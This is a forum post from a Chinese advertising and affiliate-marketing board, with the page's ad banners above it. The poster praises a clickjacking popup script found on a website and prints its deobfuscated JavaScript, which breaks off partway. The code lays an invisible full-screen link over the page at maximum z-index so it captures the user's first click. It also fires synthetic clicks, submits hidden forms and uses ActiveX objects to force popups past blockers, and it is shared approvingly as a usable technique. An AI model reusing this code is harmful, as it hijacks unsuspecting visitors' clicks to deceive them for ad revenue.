AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Adsterra China
 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G皇家代理IP⚡️#1性价比⚡️指纹浏览器,就用AdsPower
Mediabuy⚡️玩家开户首选【鲁班跨境通-自助充值转账】FB/GG/TT❤️官方免费开户Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理开户投流-7*24h❤️人工在线【官方】❤️搜索套利买量投流开户独立站⚡️开户投放
FB BM不限额,短id账单户E.PN 虚拟卡DuoPlus专注打造跨境电商云手机BINOM TRACKER 60% OFF!
比Adplexity还好用的Spy工具ADPLEXITY + ADVERTCN7200W全球动态不重复住宅IP代理全球虚拟卡, 支持U充值
Facebook 批量上广告尤里改 - FB 稳定投放免费黑五教程(持续更新、欢迎交流)FB 三不限源头 - 自助下户充值转款
各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户Google、Bing官方总代  联盟流量开户FB资源,账单户,分享户,国内一手
FB企业户BM户账单户源头海外CL企业户源头PTM全球虚拟卡—进来交个朋友!PTM虚拟卡⚡️费率透明⚡️额度随心
FB虚拟卡⚡️消费越多返现越多虚拟卡 - Pay2.House【找量】BA独家Nutra单找量广告位出租
8500万高质量住宅IP,助力各种需求虚拟卡返佣1%,国内持牌机构  
查看: 16916|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
Lemft
天星网ClickJacking点击劫持分析
& }" K; ]; K$ i7 w* c6 K2 Khttp://www.21tx.com/ 天星网
- x/ C9 p" O( `$ m$ t' j我得联系联系作者 - E" X5 j* y1 ~" z  H9 u: L% B
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。. ?- N6 o0 d3 \1 R" ~3 H, U6 E
http://www.lxting.com/script/popup/v1_min.js/ z* Z4 v* _0 G1 O: S: c
+ [; u+ B( A3 Y5 O
这个是锁定到底JS脚本,
: P$ l! \  i' F# r2 ]. E( S解密后的代码
  1. (function() { / X6 p" c, u* V) G1 j
  2.     var aa_url = window.ytpp_url; 4 G' G  H* \% i( }3 V1 P( b
  3.     var ua = navigator.userAgent; . |% ?( @; M& C$ X! k6 X  t* G
  4.     var form_div = document.createElement('div'); * ?, U  i/ h' t
  5.     var form_pd = 0;
    * S6 H& {2 Q+ T
  6.     var browser = { 8 r( d% ~: G: A+ y& ?, a( I
  7.         ie: /msie/i.test(ua),
    5 O- M4 i! Q9 D- A+ g: l
  8.         ie6: /msie 6/i.test(ua), 4 e- {7 {1 `, |5 P! V- p5 J
  9.         ie7: /msie 7/i.test(ua), : s  Q) k6 P5 ~& B5 h( H; j
  10.         ie8: /msie 8/i.test(ua), 0 J7 N/ b. o6 g1 m, K
  11.         ie9: /msie 9/i.test(ua),
    2 t+ D4 _6 o5 x2 O
  12.         360 : /360se/i.test(ua), * b% J* L$ g5 I# h$ r/ t) \% k# b
  13.         sogou: /;?se.+?MetaSr/i.test(ua), ! c: z6 \* p. i- J
  14.         maxthon: /Maxthon/i.test(ua),
    , h6 D! C6 N4 o$ O7 g$ S* u
  15.         tt: /TencentTraveler/i.test(ua),
    & ^, y0 O" Q- Y' v
  16.         ff: /firefox/i.test(ua),
    9 |4 ^/ S8 U" T, |/ V0 _
  17.         webkit: /AppleWebKit/i.test(ua), 3 ]% I2 A8 J% o  r# E
  18.         opera: /Opera/i.test(ua), ( ?# N! l% t* c. m+ A; `% _
  19.         qqbrowser: /QQBrowser/i.test(ua), , L% g1 X: x" Q
  20.         cr: /chrome/i.test(ua), , E7 V' ~  `+ D& R7 ]
  21.         gg: window.chrome,
      [* A& K* m* W- P
  22.         theworld: /Theworld/i.test(ua)
    7 E* v- d5 M8 Y' b  v5 u5 |1 s
  23.     }; 9 o; w" Z$ w% L0 [, P7 E
  24.     var _setting = "";
    1 A  d8 ?( S4 m) T. N& f
  25.     var _ct = 0;
    6 @: e2 j- [& i4 l' B
  26.     var _le = 0;
    + C/ @* U0 G# p  m+ Q
  27.     var _pd = 1;
    7 u$ N# W4 a$ s! }5 }# `
  28.     var _pd2 = 0; $ H0 d8 `7 }7 n/ r% u* d
  29.     var _pc = 1;
    8 ^0 Z% o+ x# Y+ v0 n5 l0 h4 R
  30.     var _pc2 = 1;
    / C3 O: W! s+ o& D* w
  31.     var _pco = 0;
    3 r; S" D$ o5 b' M1 s0 V
  32.     var _pta = 0; 5 ?% j/ `; i* B5 j. P
  33.     var _ptb = 0; 3 D/ ~- z% J6 i1 l- p) s
  34.     var _pt2a = 0;
    # h7 K8 X, l" O: q; }3 Q- v
  35.     var _pt2b = 0;
    8 V" a5 M1 D+ g8 _
  36.     var _pt3a = 0;
    ; u8 G; F5 D, Z% L! B' _
  37.     var _pt3b = 0; 6 ^. N" v4 F/ d* }4 I
  38.     var _pt4a = 0; 9 U. ~! U# Y/ o; N. `
  39.     var _pt4b = 0;
    & |  Z7 H# k& ?
  40.     var _pt5a = 0; ! g2 x* Z& O4 _# X
  41.     var _pt5b = 0;
    ( n5 E  `1 L, L/ Q# t
  42.     var _pt6a = 0;
    0 p6 n( m) O: C2 i" G+ J) }
  43.     var _pt6b = 0;
    # f1 y9 V  W: n5 Z& ^" H* ^
  44.     var _pt7a = 0;
      U! f% q# G1 r) o( r. |9 I$ R; U& G
  45.     var _pt7b = 0; : \1 z, i, T( p0 f% K1 l& \
  46.     var _pt8a = 0; . X3 ^# C) L1 Q  ?# G2 G  o/ W
  47.     var _pt8b = 0; 6 I; |3 _6 u9 s. s- D. j
  48.     var _pt9a = 0;
    . f" a) y6 R% g/ K9 w
  49.     var _pt9b = 0; / `, ^( N: Q% P4 C% f, k; q
  50.     var _pt10a = 0;
    ' P4 T# C2 X- u% {7 ?" w
  51.     var _pt10b = 0; ( N6 h2 n, `- K- O9 q. X; @
  52.     var _po = 0;
    , u2 G/ H% F- O; @/ a; P6 o
  53.     var _poo = 0;
    8 [1 Q" w3 j) Q8 z& f1 a
  54.     var ckn, ckt;
    1 [! g" A. k4 S
  55.     var ads = 0; 7 z0 Y% x5 S" B# c- O) k4 H" n
  56.     function b(w) { ; ~) C' x& a9 m0 v
  57.         var s = w + "="; ) Z8 x( y: e2 N* [
  58.         var r = ""; ; N0 {4 u4 W" T8 z
  59.         var o = 0; 1 V+ q' l" k6 x  Y# u* g
  60.         var d = 0;
    & R2 f; ^7 O. b# D) O- b6 z% t
  61.         var p = document.cookie;
    4 s, ?0 s4 \( D6 D. S2 w
  62.         if (document.cookie.length > 0) { % B4 a" z, {5 P* o+ r
  63.             o = document.cookie.indexOf(s);
    8 z  P3 V" p% G5 c1 Z
  64.             if (o != -1) { 6 ]) I& }: q+ [" \( J0 L
  65.                 o += s.length; * x5 U* A9 \5 `' v+ g9 [% R) o
  66.                 d = document.cookie.indexOf(";", o); ) W  V* J, f! e# ~9 n4 m; ~
  67.                 if (d == -1) d = document.cookie.length; 7 M  G& O' ]( X2 I  y& l
  68.                 r = unescape(document.cookie.substring(o, d))
    1 P$ U. C: ~8 O( w
  69.             }
    0 F5 f& t8 z" k4 b! ^, J
  70.         } : G& k: y$ o9 c/ H9 \1 I$ |3 O( Z/ ]
  71.         return r
    9 [- c% `- H! E% R
  72.     };
    " r8 A* Q) M) `& w3 {0 _; s* {
  73.     function p(w, p, v) {
    4 s0 x0 I$ z* U. E1 }8 ?' E
  74.         var t = 30; ( D, W: {9 H. x( ~9 N- O: p
  75.         try {
    % G& y* x" K) W, q) j
  76.             t = parseFloat(p) * 1
    ( V, ~' L0 Y& c2 p: m  j) z1 N, h
  77.         } catch(e) { + J& o, m9 b8 J) Y
  78.             t = 30 ! F; B) g* w6 z  D, q# U
  79.         } 4 v2 V" ]" V7 C6 ?4 [! I: c
  80.         if (isNaN(t)) t = 30;
    3 R. Y2 k$ P$ J7 U
  81.         var then = new Date();
    . Y. k5 Q) F& x- C
  82.         then.setTime(then.getTime() + t * 60 * 1000); / M! c0 l% p0 p1 N7 F( S
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    # g/ B  d) C2 Q" r5 e
  84.     };   t9 Q8 ?" b' u6 n$ z0 Z+ Q3 D4 S' H
  85.     function init() { 3 a: H( L: ^2 L  _) E
  86.         _setting = ytpp_sti; / b* {) M( Q. ?/ F/ K
  87.         if (getp(_setting, "CT")) { 3 [  {1 p% g- [& E! X& j
  88.             _ct = getp(_setting, "CT") " f& {; U+ V; k5 O
  89.         }
    9 s( v( |7 J5 d) y
  90.         if (getp(_setting, "LE")) {
    & L2 ], x5 Q5 l& e' W3 b
  91.             _le = getp(_setting, "LE") / F- e$ b8 Y9 `' \% k0 y4 j, d
  92.         } 3 g- D& i7 n! M& O# \9 r) M
  93.         if (getp(_setting, "PD2")) { * W# t1 d  P  ^* I7 L  U
  94.             _pd2 = getp(_setting, "PD2") ' d% m! Z% Z& P
  95.         } * R: [; _( m, P7 U; o& R1 u
  96.         if (getp(_setting, "PC2")) { 9 Y5 {4 \/ \/ T( G$ I
  97.             _pc2 = getp(_setting, "PC2") ' x& z' P( q# T4 J. b
  98.         } + M( Y8 W5 o0 B, M8 v% Q
  99.         if (getp(_setting, "PCO")) { ( r, k& V+ o- M0 s
  100.             _pco = getp(_setting, "PCO")
    & Q* w* }5 j. r; R) s
  101.         }
    ; z2 a2 ~* a3 H3 B8 `
  102.         for (var i = 1; i <= 10; i++) { 8 o9 o. X. _, Z3 w
  103.             var n = i == 1 ? "": i;
    5 n+ D  Z; Y1 I; K% S
  104.             if (getp(_setting, "PT" + n)) { ( i, d6 b0 i0 Z2 y  y
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); " d: ^. M5 [/ ~  f! ]! P
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];"); 7 ^. z2 a) t  m1 n! M
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];")
    4 Q0 `9 D7 g( s. C
  108.             } 5 R' H' I/ R, J$ S! |# c1 ~
  109.         } ( G* X$ T# f% O$ U& @7 ?- V
  110.         if (getp(_setting, "PO")) {
    1 B) c& V, h' [" o: n& g& K8 W4 k
  111.             _po = getp(_setting, "PO")
    ; H5 u+ U% j) I& t8 W8 i
  112.         }
    * ^. z/ S/ |4 B6 Z/ L; O
  113.         if (getp(_setting, "POO")) {
    0 Q+ f* ~( K: A0 D" o
  114.             _poo = getp(_setting, "POO") / \9 W! W* U" d1 g  T
  115.         }
    : _2 S4 p7 c- @0 P# D
  116.         if (_pco == 1 || _poo == 1) {
    7 Y- U/ Z! x/ [3 Z
  117.             if (_poo == 1) {
      i/ w2 |" I' I9 M+ q9 `
  118.                 _pco = 0
    # O+ S  a* p9 U$ Z1 g. m
  119.             } else {
    / l) I$ l7 g0 W* v- r% O
  120.                 _poo = 0 - V, B6 f$ ~) _, L/ \
  121.             } ) z! ?  i7 x/ u' G* |9 l! Z( @+ e
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
    + ?$ p% q0 W. {
  123.             for (var i = 2; i <= 10; i++) { 3 r' }- k9 ?- h- R7 T4 M
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;")
    : H% c0 S% c: z2 v$ a0 A3 q7 W& F
  125.             }
    9 H* n; [% i) |; K6 P
  126.         } 8 {6 y/ b5 i9 u2 \% v" M
  127.     }; 8 V# F8 x& ?1 j% k( W5 m
  128.     function getp(s, p) {
    4 s3 N5 t, J/ @* J& N
  129.         var i = s.indexOf(p + ":"); - K9 j% g3 L' M+ P! ~0 S, j
  130.         if (i >= 0) { 3 \# J2 g3 Q, |7 G
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
      L% D3 r9 k( e0 o. ?# W
  132.         } & ~9 ~) O6 M, I6 ]# {8 s7 V
  133.     };
    * b$ ?; {/ T4 _
  134.     function event(e, event, func, act) {
    , F. T" i; n( Y  r
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
    . o# g; `6 E4 B( o* m
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
    5 \4 f* x  ]2 a2 b& E1 j
  137.     }
    7 k* d$ o/ b9 u  E2 n' c" X7 j- ]
  138.     function pop(url, param) {
    % o5 z7 g5 e5 v- R8 A
  139.         if (!document.body) {
    5 |( C2 F0 m7 k: t
  140.             return setTimeout(function() { " W3 s% |& F7 z1 M
  141.                 pop(url, param) # A/ l; e' u* F. U8 y0 E
  142.             }, 7 Q! x* t: O6 z" F/ W- P. ]
  143.             13) $ G. r; B. h: D, l& S
  144.         } 8 V# y/ a2 `. ~) x
  145.         try {
    0 ^6 l$ I) v& b* t
  146.             if (browser['cr'] && browser['gg']) {
    2 A0 v* d& `4 C6 M+ b5 g2 p
  147.                 try { ) O! f( l! w% J
  148.                     hrefopen(url) . y0 P" p  N4 C" |+ ?
  149.                 } catch(e) {
    $ Z1 b6 F* u- y( |% I
  150.                     a_pop(url)
    ! @3 F% S1 N1 N" m* B4 Z: X
  151.                 } / y* X( C$ g9 L$ P7 B
  152.             } else if (browser['webkit'] && browser['maxthon']) {   n$ w7 n/ a/ g% z% l$ [# q
  153.                 if (!func(url)) {
    1 |. y5 Q9 a9 X; E& Y0 [) K& q
  154.                     try { 3 I9 q* L6 w7 S) r
  155.                         form_pop(url); # k% Q. u& D. T" h) `
  156.                         a_pop(url)
    3 z0 l9 ?/ U( y% _
  157.                     } catch(e) {}
    + Q: a7 b% M2 K
  158.                 }
    $ ?3 B: B$ l* a4 t# [
  159.             } else if (browser['tt']) {
    ! T" O4 U2 q: K5 r# h) o" V" {$ V
  160.                 try { / q* J5 ^8 o! ]* D
  161.                     object_pop(url) * ^  f0 ?- n0 C6 y( o( p
  162.                 } catch(e) {
    3 W2 [3 M6 L4 p* P- ]2 N, a
  163.                     a_pop(url) + N' ~$ S4 x. A6 n3 Q
  164.                 }
    + z7 a% A) @: f2 ~! X4 P$ @, W! Y) c
  165.             } else if (browser['sogou']) { * H5 J: T/ c) y4 u4 @, g6 K) [; X
  166.                 if (!func(url)) { 1 C; _  ]) e* K. o! E- N
  167.                     try {
    * K5 m/ v5 a1 X1 F, x" L) m) {; S: c
  168.                         a_pop(url)
    8 v$ D- W3 X5 Y5 ^- X# j
  169.                     } catch(e) {}
    $ d$ U5 Y; v, A) G4 |0 X/ p3 t0 B- ]
  170.                 } 5 I4 P' W% l3 f6 q( a
  171.             } else if (browser['webkit'] && browser['qqbrowser']) { : R9 m- s  ]7 p: s. m! j9 M
  172.                 if (!func(url)) {
    2 c7 x4 z) m& `! y& b
  173.                     try { ) v) q  U/ h! g
  174.                         form_pop(url) 7 C  _7 J7 ~4 V: ?! p
  175.                     } catch(e) {
    , r0 n- B# t6 B/ e2 J  g2 x7 a
  176.                         click_pop(url)
    7 w# @/ x9 S3 s: {5 n
  177.                     } - m0 ]# p6 ?5 I8 K, [2 C6 y4 S4 k" s
  178.                 }
    2 |/ z; |) W/ W7 }, ]" u
  179.             } else if (browser['webkit'] || browser['opera']) { # T+ g4 w: e  g9 B" d! L
  180.                 try {
    6 Y4 J3 a! J( F) F+ W; A, S
  181.                     form_pop(url); ( U$ C- u# e, |6 A  d
  182.                     a_pop(url) % s: E: i4 r, E* f: p5 o5 i. n
  183.                 } catch(e) {} 5 ?4 G/ Q2 `# n% Z- p; D6 A9 [
  184.             } else if (browser['theworld'] && browser.ie6) { ; z! u" h9 z4 @  ?( j
  185.                 if (!object_pop2(url)) { # c- L3 n- _' b
  186.                     a_pop(url)
    4 t& F; x$ T# |9 \
  187.                 } 6 h9 `1 }% P5 W" c
  188.             } else if (browser['theworld'] && browser.ie8) { 0 K) T! Y) o' u1 D
  189.                 if (!func(url)) { 6 _9 |! s" O4 a" z- N  m$ z; q
  190.                     try {
    & v* c0 y+ f3 U4 m( P) h1 U
  191.                         object_pop(url)
      h  r; c) J: A$ J
  192.                     } catch(e) { ( r8 j' U7 b  l) m! y' M7 e
  193.                         click_pop(url)   ]3 e* Q. I4 H0 ]
  194.                     }
    * A  l( q- ~; N/ ^
  195.                 } 8 W5 y0 f: o% ]' R' {
  196.             } else if (browser.ie6) {
    0 B/ Y  o0 h( ~' H$ T& D
  197.                 if (!func(url)) { 5 b: p; c. x! ~; {8 Z
  198.                     object_pop2(url) " e6 S6 n5 E$ ~# q3 U+ J) c
  199.                 } 3 W) z6 m/ }0 K5 }
  200.             } else if (browser.ie8) {
    5 q) U4 j( s7 \# ^
  201.                 if (!func(url)) { / g8 R; Y$ A+ y/ @% _# @
  202.                     try { # }- z7 G3 T7 b+ M
  203.                         object_pop(url) 9 Z3 N5 Y0 R2 |& H' o8 Z
  204.                     } catch(e) { / I( s# ]% U0 h/ c
  205.                         document.onclick = function() {
    " s$ j! P8 r0 ]# V3 ?6 L0 {
  206.                             func(url);
    ( o$ q" a& y' q5 o  \# H" Z
  207.                             document.onclick = null
    # o3 o( [! H7 f6 t# ^
  208.                         } 9 J6 Z0 B8 B3 i# k1 t$ j
  209.                     } 8 T* U+ a3 ^: ?3 L9 U8 {% a
  210.                 }
    ; a0 v' g- M# N" d) N
  211.             } else if (browser['ie']) { / Y* h0 n2 H6 s2 N; h
  212.                 try { / B" J$ |& Q- @2 V
  213.                     object_pop(url) / m' n" T$ l) `- W2 z
  214.                 } catch(e) { 7 [1 v9 N) ?! y5 p0 i) m  O. r% U
  215.                     click_pop(url)
    . f: N2 f: l+ m+ C' I, Y. \7 e6 ]0 H
  216.                 }
    ; y, X- d0 M) {! Z+ @8 X0 i
  217.             } else if (browser['ff']) {
    8 t, B. M' a# B: S
  218.                 if (!func(url)) {
    ' G) S8 Q! n- s1 A
  219.                     click_pop(url) 8 V' b7 e) Z$ w$ G2 R6 @1 r
  220.                 }
    7 u# B# c7 N" {" N
  221.             } else { " Y) z8 I, l5 ?
  222.                 if (!func(url)) {
    ) ]3 D. z* w( n9 l) O' c
  223.                     click_pop(url) 4 _3 ?' L$ P" }9 ?4 q
  224.                 }
    ! S! j! y. k: ]% J) u8 ^
  225.             }
    5 q0 w- N' A" D/ D8 \7 d5 W
  226.         } catch(e) {
    5 S6 k1 C3 b; Q) ^  d, u; _
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { 8 J' B; Q( j. w3 p
  228.                 click_pop(url) 5 Q! s0 A' k. z0 S( c
  229.             } else { ! l/ {7 j3 x: C( [* R# _9 {
  230.                 a_pop(url) , p  P, n% o3 f5 p5 H
  231.             }
    # X) Y6 q, s: z, W3 F" h4 k/ O
  232.         } 8 {1 V% t$ D9 ^
  233.     }
    2 t1 p4 x# n, Z4 A* Q4 w4 S
  234.     function object_pop(url, param) { 1 K0 m) O0 v& @$ A. D+ q/ ?! \8 {
  235.         var object = document.createElement('object');
      X* Q# K" Y$ W2 f2 C5 N
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
    % {" h8 O4 e4 Y, q" h0 p6 |
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
    ( K3 J2 j# u: e* d- k( L7 L' r
  238.         append(object);
    ; ^/ h1 O/ C) n# |  v
  239.         object.launchURL(url); ) d% e9 b8 `- U2 C3 ~- {
  240.         ads++;
    ( F. A) k9 ]7 j- t5 p/ c7 ~
  241.         p(ckn, ckt, ads) 0 J8 l8 u9 o: j! z/ q$ }& o5 v( c$ A
  242.     }
    . s3 S% |" Y6 V1 _- U7 S. A
  243.     function object_pop2(url, param) { . \2 C+ ~# L# p& o, |- l
  244.         var object2 = document.createElement('object'); ! j7 Q1 [1 ]* ~% F0 K5 x: m( f
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); # U( _6 x3 G2 Y' Z, F( f( _+ Y
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
    ) t, f# O7 h5 k& c" ]  y5 E
  247.         append(object2); 6 L' }& Z/ k- {8 F  t
  248.         for (var i in object2) { 5 \! K2 O% D+ i- X: x
  249.             try { (function(o) {})(object2[i])
    7 u; T% I5 w8 ?  _
  250.             } catch(e) {} & }9 h2 J$ A& m/ L3 r4 r
  251.         }
    ( o8 b$ ]: p3 X  @+ b5 z; d4 A# Z
  252.         setTimeout(function() { : Z7 j" H& E! E* K- [- J
  253.             object2.DOM.Script.open(url, '_blank', '')
    0 E4 E" `5 z3 p
  254.         },
    3 o9 d2 Q2 y6 s
  255.         500); 0 o+ E, R' V9 c% h; k
  256.         ads++;
    & _1 x. H* t% }2 f& W. @4 [
  257.         p(ckn, ckt, ads)
    ( H  ]" h" S* u: C! m8 [( Q/ v1 L
  258.     } : ^: v0 V; ~2 _1 G
  259.     function append(e) { / ^4 @  l, ~( N7 H# ^( o
  260.         for (var t in {
    9 ]  j1 s1 ~9 p: I8 C2 G, b/ s
  261.             body: 1
    ' D& H- Q0 T/ m9 {' H3 q; ?
  262.         }) { 9 c% V( B+ J: F; d5 j% ^, b# p) I5 M4 A
  263.             var ele = document.getElementsByTagName(t);   H" R9 C3 d' |3 m6 g( I
  264.             for (var i = 0; i < ele.length; i++) {   ~% B3 ]' N7 r8 `, `, e
  265.                 ele[i].insertBefore(e, ele[i].firstChild);
    7 `; I, K5 T1 p, X8 Q( ]0 M2 S
  266.                 return" y8 o' m" h, ~; p5 u5 P9 D# l
  267.             }
    $ u( N" Q  @7 \" M7 M- R
  268.         }
    7 q( c0 y3 ~) F8 ^$ L1 B
  269.     } , Z7 F+ l* H# h" p4 p9 P
  270.     function hrefopen(url) { : F& {; e& O( L6 l4 g: v+ k
  271.         try { 9 C1 h) j) ~5 Q3 I) N1 e
  272.             var c = document.createElement("a"); : j0 c& W, p7 i, O) t! Y
  273.             c.setAttribute("href", url);
    ; d, M1 w) G5 W: D5 p. V
  274.             c.setAttribute("target", "_blank");
    : n- r. {) k6 [* C
  275.             c.setAttribute("style", "display:none;"); 4 o  e( h7 _9 v
  276.             var b = document.createEvent("MouseEvents"); 5 F) b  M8 K+ L( X
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    $ Z3 ?$ X4 q" }3 E
  278.             c.dispatchEvent(b);
    7 N& D( X7 w6 _( m
  279.             ads++;
    ' C5 J+ r2 F5 W; j" X2 b3 h# D
  280.             p(ckn, ckt, ads); ! A7 z2 Z  ^, e4 D! `! ?7 u& }
  281.             return true
    " p  u% B6 L. u
  282.         } catch(q) { 5 a9 l6 F  Q, W8 `0 G9 ~6 y
  283.             return false
    " s2 N9 x! `- X$ d- h# `
  284.         }
    4 L# y- k, ^' N1 I1 U  E1 `; p2 v
  285.     }
    1 N) f2 [9 z; g9 z, T5 A
  286.     function form_pop(url) {
    4 b& a( y, y0 Y3 H# C1 A$ Q4 e
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__');
    3 G4 K( i6 L, Y7 @
  288.         form_div.setAttribute('style', 'display:none');
    * N5 C. T3 O7 q) m7 b
  289.         var form = document.createElement('form'); 3 [3 |# a) f+ ^3 a
  290.         form.setAttribute('action', aa_url);
    ( d3 E8 E! H9 {7 y3 w! ]. m
  291.         form.setAttribute('method', 'post');
    2 b) B0 ^3 ]+ J  r
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__');
    " a2 Z6 V. c. _8 B
  293.         form.setAttribute('target', '_blank');
    3 G8 ]  x, f7 J5 p9 W  \
  294.         form.setAttribute('style', 'display:none');   K6 Z! Q; D5 w( c" J
  295.         var sinput = document.createElement('input');
    ) `) r" _8 V, V: ^4 P2 Y$ n
  296.         sinput.setAttribute('style', 'display:none');
    / K& J. `- A: G4 T& l, U
  297.         sinput.setAttribute('type', 'submit');
    ) o2 t% l' z' M* n9 j& K4 V
  298.         sinput.setAttribute('id', '_sumit_2app'); # q6 q$ @1 f8 v8 r( F, F
  299.         form.appendChild(sinput);
    9 `( |7 n( _; e% T# H; X
  300.         form_div.appendChild(form);
    : P/ A2 B* q5 F1 y
  301.         append(form_div);
    ! I  a2 G/ {  Q/ N3 p6 q* V" X
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
    + U! ]0 l# L: f; c- d4 q: I
  303.         try { . G2 r* M. ?  L4 ~% K% f, D% {
  304.             document.getElementById("_sumit_2app").click() 5 B- A* I6 P) v
  305.         } catch(e) {
      }- z% `* H5 q% h2 ]" t
  306.             event(document, 'keyup',
      w' W' J0 F% {- k9 j
  307.             function(e) {
    9 K. ~& }% n0 c
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) { $ q+ C+ h' o8 Z' p
  309.                     return9 T7 g, f: X' h& T* a4 r6 }  M
  310.                 };
    3 a) }/ c7 r6 d3 G  w: ?
  311.                 e = e || window.event; $ _$ @9 S1 v% |- H& S& k
  312.                 e.canceBubble = true;
    9 x+ t3 }/ m2 _- E$ z; W+ `
  313.                 event(document, 'keyup', arguments.callee, true); 7 z" {; H- d( b1 A7 v
  314.                 form_pd = 1;
    4 H* e  D8 @0 E3 F" h
  315.                 unionsky_from.submit()
    ; N3 }( _, [8 t. i0 F2 G& g
  316.             }) & k6 g1 N+ o# Y! z' d
  317.         } 5 ^6 o* j% z5 F8 j0 s
  318.     };
    3 K% S* s6 B3 M# L
  319.     function click_pop(url, param) { 6 J4 i5 v0 M5 h
  320.         event(document, 'mouseup', 5 U" P  s7 Z: z; `0 [. W+ [
  321.         function(e) { 1 p- c! M# H5 J% {- m. K. r
  322.             e = e || window.event; % ~+ g7 ?: ]( S0 `) L& O
  323.             e.canceBubble = true;
    . e# g* I9 S% Y$ Y4 }- b! j
  324.             event(document, 'mouseup', arguments.callee, true); , \" o5 j$ A8 `
  325.             func(url, param); ! ?1 c6 X! r! P' a+ z. v$ s# l
  326.             ads++;
    , ]/ T" C* M! H0 ~8 j' T
  327.             p(ckn, ckt, ads) ( L# q. \4 N* T  ~0 g
  328.         })
    - K* t. g. d3 X' ^2 Y* Y
  329.     };
    # c; ?3 Y( i4 a/ m- X4 I
  330.     function a_pop(url) {
    " t' F! f; V; H8 X; k( }# q
  331.         if (ytpp_plid == 166028) { - G: h, P6 }, E* F
  332.             return" U- U8 w5 \+ Y& n, S/ r
  333.         } / Q/ l# ]: R1 k$ H0 K! E) M
  334.         if (!document.body) { 3 P3 h9 ^8 J/ g! Q$ u  M
  335.             return setTimeout(function() { 3 K# }$ O6 A$ D& b  }1 _
  336.                 a_pop(url)
    * u, o# u  k/ F0 Q  @/ }5 ]
  337.             }, : z5 T4 v( _. X" y1 y1 e& e
  338.             13) ( k7 J' ]0 B' d: r7 h
  339.         }
    9 [+ @8 Q5 ?5 F0 b* r. ^
  340.         var a = document.createElement("a");
    - l, K' h( b' C5 M
  341.         a.href = url;
    : ~: s% l" m) w: [" m7 |
  342.         a.target = "_blank"; ( m& O. X1 v$ P4 B7 j
  343.         var div = document.createElement('div'); + M( A- i% J2 ?) p: }+ _, F
  344.         div.style.backgroundColor = '#fff';
      Y0 k' c/ ]( a! m
  345.         a.appendChild(div);
    , ]3 B. X9 r" [8 ?! R; `
  346.         append(a);
    8 ?8 w/ i: b5 P2 ]4 t1 j
  347.         var as = a.style; 2 `) n  I: e. z9 M0 g
  348.         as.position = "absolute"; 3 Y- w, W8 ]% S8 L7 \) e
  349.         as.zIndex = '2147483647'; " U* @! ~9 m* `
  350.         as.display = "block"; + }9 I- F/ }& [0 J/ V& g
  351.         as.top = "0px";
    " }% Q' J! [- m6 A4 z* g4 ?
  352.         as.left = "0px";
    " V/ l* t8 A. h
  353.         as.cursor = 'default';
    2 y/ P9 z$ d: u6 ~
  354.         as.opacity = "0"; 3 D) a/ z) B2 d
  355.         as.filter = "alpha(opacity:0)";
    ) Q- g7 y1 e1 J$ M+ x7 X9 A
  356.         var m = setInterval(function() {
    5 ]0 B- U, O; Y# @5 E4 B1 H/ G3 Z
  357.             if (form_pd == 1) {
    0 Q* P3 z* `1 T: E
  358.                 a.parentNode.removeChild(a); 7 S& j2 ~; N- R$ K; w5 D
  359.                 clearInterval(m); & q. @2 M+ u( O+ ]9 L$ b1 m
  360.                 return
    " A) p! J0 b$ F' o  x! Q: \/ `9 T
  361.             }
    9 I" E& _' d* q3 r/ d
  362.             a.style.zIndex = '2147483647';
    / O1 Y& w; x0 a- q& O* s
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; ' s. `& o2 W4 d
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
    ) T7 Z, ?' j0 d& |9 R# X0 T
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    , G& }- |. J1 O8 `
  366.             div.style.height = d.clientHeight + 'px';   _& }( Q4 a  @1 _
  367.             if (browser['ie']) {
    7 r0 W9 g7 W3 N! F: m
  368.                 try { , @, u+ X/ z4 g
  369.                     var divs = document.body.childNodes;
    ! D3 `% ~4 D1 e1 S) e2 I
  370.                     for (var i = 0; i < divs.length; i++) { " o3 \" ~1 K! b8 M. n
  371.                         if (!divs[i]['style']) {
    4 d/ U# O6 o5 ?' b, Y) ^! \3 A
  372.                             continue
    0 N$ M6 |9 _) n* C2 k" b5 k) |
  373.                         } 0 x# L9 h3 Q, }: c1 w
  374.                         var _i = parseInt(divs[i].style.zIndex); 7 R# J: ]7 q% K0 ~! r- I2 A
  375.                         if (_i && divs[i] != a && _i == 2147483647) {
    / ~0 T. f1 k! {1 Q9 H4 V
  376.                             divs[i].style.zIndex = _i - 1
